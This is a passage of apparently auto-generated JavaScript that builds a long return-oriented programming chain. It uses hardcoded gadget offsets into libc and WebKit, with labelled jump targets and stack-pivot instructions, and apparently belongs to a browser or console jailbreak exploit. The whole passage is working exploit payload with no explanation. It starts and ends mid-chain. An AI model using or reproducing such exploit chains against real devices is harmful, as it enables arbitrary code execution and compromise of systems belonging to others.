db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L6104: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6105: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6106: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+310816, //L6107+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+310808, //L6107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6107: db([0, 0]); // 0x0 set_gadgets([ ropchain+310832, //L6107+24 ropchain+311784, //L6101 libc_base+764760, //pop rsi ropchain+310872, //L6108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L6108: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6110: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+310992, //L6113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+310976, //L6111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6111: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6113: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+311136, //L6116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+311104, //L6114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+311120, //L6115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6114: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6115: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6116: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+311232, //L6118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6117: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L6118: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6119: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+311336, //L6120 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+311352, //L6121 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6120: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6121: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+311528, //L6123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+311544, //L6124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+311512, //L6122 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6122: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6123: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6124: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+311688, //L6127 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+311704, //L6128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+311656, //L6125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6125: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6126: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L6127: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6128: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+311776, //L6129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 
//pop rcx ]); //L6129: db([0, 0]); // 0x0 //L6101: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+311904, //L6132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+311920, //L6133 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+311888, //L6131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6131: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6132: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6133: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+312032, //L6135 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+312080, //L6138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+312048, //L6136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L6135: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6136: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6137: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6138: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+312192, //L6139+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+312184, //L6139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L6139: db([0, 0]); // 0x0 set_gadgets([ ropchain+312208, //L6139+24 ropchain+312224, //L6134 libc_base+782311, //pop rsp ropchain+300936, //L5858 //L6134: //L6140: //L5852: libc_base+764760, //pop rsi 
ropchain+312264, //L6141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6141: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6143: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+312384, //L6146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+312368, //L6144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6144: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6146: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+312560, //L6149 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+312576, //L6150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+312528, //L6147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+312544, //L6148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6147: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6148: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6149: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6150: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+312672, //L6152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+312656, //L6151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6151: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6152: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+312752, //L6153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6153: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6155: db([80, 0]); // 0x50 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+312872, //L6158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+312856, //L6156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6156: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6158: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+313048, //L6161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+313064, //L6162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+313016, //L6159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+313032, //L6160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6159: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6161: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6162: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+313160, //L6164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+313144, //L6163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6163: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L6164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+313240, //L6165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6165: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6167: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+313360, //L6170 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+313344, //L6168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6168: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6170: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+313536, //L6173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+313552, //L6174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+313504, //L6171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+313520, //L6172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6171: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6172: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6173: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6174: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+313648, //L6176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+313632, 
//L6175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6175: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6176: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+313728, //L6177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6177: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6179: db([64, 0]); // 0x40 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+313848, //L6182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+313832, //L6180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6180: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6182: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+313992, //L6185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+313960, //L6183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+313976, //L6184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6183: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6184: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6185: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+314072, //L6186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6186: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6188: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+314192, //L6191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+314176, //L6189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6189: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6191: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+314352, //L6195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+314320, //L6193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+314336, //L6194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6192: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6193: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6194: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6195: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+314408, //L6197 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6197: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+314536, //L6199 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+314552, //L6200 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+314520, //L6198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6198: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 
//L6199: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6200: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+314712, //L6204 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+314680, //L6202 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+314696, //L6203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6201: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L6202: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6203: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6204: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+314768, //L6206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L6206: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+314896, //L6208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+314912, //L6209 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+314880, //L6207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6207: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L6208: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6209: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+315024, //L6212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+314992, //L6210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L6210: db([0, 
0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6211: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6212: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+315128, //L6213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6213: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6215: db([4294967256, 4294967295]); // -0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+315248, //L6218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+315232, //L6216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6216: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6218: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+315392, //L6221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+315360, //L6219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+315376, //L6220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6219: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6220: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6221: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+315488, 
//L6223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L6222: db([4294967264, 4294967295]); // -0x20 set_gadget(libc_base+759608,); //pop rax //L6223: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+315576, //L6224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6224: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6226: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+315696, //L6229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+315680, //L6227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6227: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6229: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+315840, //L6232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+315808, //L6230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+315824, //L6231 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6230: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6231: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6232: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+315920, //L6233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6233: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6235: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+316040, //L6238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+316024, //L6236 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6236: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6238: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+316184, //L6241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+316152, //L6239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+316168, //L6240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6240: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6241: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+316264, //L6242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6242: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6244: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+316384, //L6247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+316368, //L6245 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L6245: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6247: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+316528, //L6250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+316496, //L6248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+316512, //L6249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L6248: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6249: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L6250: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+316608, //L6251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L6251: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L6253: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+316728, //L6256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+316712, //L6254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6254: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L6256: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+316872, //L6259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+316840, //L6257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+316856, //L6258 webkit_base+660161, //mov [rsi], rax ; mov al, 
